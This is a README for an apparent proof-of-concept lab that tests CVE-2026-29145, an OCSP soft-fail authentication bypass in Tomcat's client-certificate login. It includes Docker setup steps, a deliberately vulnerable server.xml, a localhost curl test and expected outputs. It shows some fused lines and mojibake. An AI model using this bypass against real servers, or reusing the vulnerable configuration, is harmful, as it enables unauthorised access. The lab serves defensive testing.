
This repository contains a proof-of-concept (PoC) environment designed to test for CVE-2026-29145.
This repository contains a proof-of-concept (PoC) environment designed to test for CVE-2026-29145.
The vulnerability is an authentication bypass in Apache Tomcat's Mutual TLS (CLIENT_CERT) implementation. When OCSP (Online Certificate Status Protocol) is configured with soft-fail disabled, Tomcat may fail to treat an OCSP check failure as a hard denial. This allows a client with a potentially revoked or unverified certificate to bypass authentication if the OCSP responder is unreachable or returns an error.
| Property | Value |
|---|---|
| CVE ID | CVE-2026-29145 |
| CVSS Score | 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| Attack Vector | Network |
| Privileges Required | None |
| Impact | Authentication Bypass |
.ps1 scriptsThe run_test.sh script automates the entire process: cleanup, certificate generation, and running all test scenarios (vulnerable, success, and patched).
# Navigate to the project directory
cd CVE-2026-29145-Tester
# Make scripts executable
chmod +x cleanup.sh setup_certs.sh run_test.sh
# Install Python dependencies (if poc_exploit.py requires them)
pip install -r requirements.txt
# Run the full test suite
./run_test.sh
On Linux/macOS:
./setup_certs.sh
On Windows (PowerShell):
.\setup_certs.ps1
What this does:
http://localhost:8888Expected output:
[INFO] Starting certificate generation for CVE-2026-29145 testing environment
[INFO] OpenSSL found: OpenSSL 3.0.x (...)
[INFO] Created certs directory
[INFO] Generating Root CA...
[INFO] Generating Server Certificate...
[INFO] Generating Client Certificate with OCSP Extension...
[INFO] Certificate setup completed successfully!
docker-compose up -d
What this does:
Verify containers are running:
docker-compose ps
python poc_exploit.py
Expected outputs:
Vulnerable System:
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[WARNING] VULNERABLE: Access granted despite OCSP check failure.
[WARNING] Response preview: <html>...
Patched System:
[INFO] Attempting connection to https://localhost:8443/protected-resource...
[INFO] NOT VULNERABLE: Access denied (Authentication working).
| Scenario | OCSP Status | Expected (Patched) | Result (Vulnerable) | Notes |
|---|---|---|---|---|
| Normal Operation | Online & Valid | 200 OK β | 200 OK β | OCSP check succeeds, access granted |
| Soft Failure | Offline/Timeout | 403 Forbidden β | 200 OK β | BYPASS - OCSP responder unreachable |
| Hard Revocation | Online & Revoked | 403 Forbidden β | 403 Forbidden β | Certificate explicitly revoked |
| Invalid Certificate | Invalid Chain | 403 Forbidden β | 403 Forbidden β | Chain validation fails |
Test 1: Default (OCSP Responder Failing)
# Keep containers running
python poc_exploit.py
Test 2: Stop OCSP Responder (Simulate Timeout)
docker-compose pause ocsp-responder
python poc_exploit.py
docker-compose unpause ocsp-responder
Test 3: Manual Testing with curl
curl -v \
--cert certs/client-cert.pem \
--key certs/client-key.pem \
--cacert certs/ca-chain.pem \
https://localhost:8443/protected-resource
CVE-2026-29145-Tester/
βββ README.md # This file
βββ setup_certs.sh # Certificate generation script - Bash (Linux/macOS)
βββ setup_certs.ps1 # Certificate generation script - PowerShell (Windows)
βββ cleanup.sh # Cleanup and reset script - Bash (Linux/macOS)
βββ cleanup.ps1 # Cleanup and reset script - PowerShell (Windows)
βββ run_test.sh # Automated full test cycle script
βββ docker-compose.yml # Docker service orchestration
βββ requirements.txt # Python dependencies
βββ poc_exploit.py # Main testing script (with logging and error handling)
βββ simple_proxy_fail.py # Mock OCSP responder (with detailed logging)
βββ .gitignore # Git ignore rules for certificates and logs
βββ certs/ # Generated certificates (created by setup_certs scripts)
β βββ ca-chain.pem # Root CA certificate
β βββ ca-key.pem # Root CA private key
β βββ server-cert.pem # Tomcat server certificate
β βββ server-key.pem # Tomcat server private key
β βββ client-cert.pem # Test client certificate
β βββ client-key.pem # Test client private key
βββ tomcat/
β βββ server.xml # Vulnerable Tomcat configuration
βββ logs/ # Tomcat logs (created at runtime)
The tomcat/server.xml file configures:
<SSLHostConfig
hostName="localhost"
certificateVerification="required"
caCertificateFile="conf/certs/ca-chain.pem">
<OpenSSLConf>
<ConfCommand name="OCSP" value="on"/>
</OpenSSLConf>
</SSLHostConfig>
Key Settings:
certificateVerification="required" - Enforces CLIENT_CERT authenticationOCSP on - Enables OCSP revocation checkingThe mock OCSP responder (simple_proxy_fail.py):
localhost:8888# macOS
brew install openssl
# Ubuntu/Debian
sudo apt-get install openssl
# CentOS/RHEL
sudo yum install openssl
Cause: Certificate generation failed or was not run.
# Clean up and regenerate
rm -rf certs
./setup_certs.sh
Cause: Tomcat container is not running or not ready.
# Check container status
docker-compose ps
# Check logs
docker-compose logs vulnerable-tomcat
# Ensure both services are running and healthy
docker-compose up -d
sleep 10 # Wait for services to start
Cause: Tomcat taking too long to start or network issues.
# Check Tomcat startup logs
docker-compose logs vulnerable-tomcat
# Increase timeout and retry
timeout 30 docker-compose logs -f vulnerable-tomcat # Monitor startup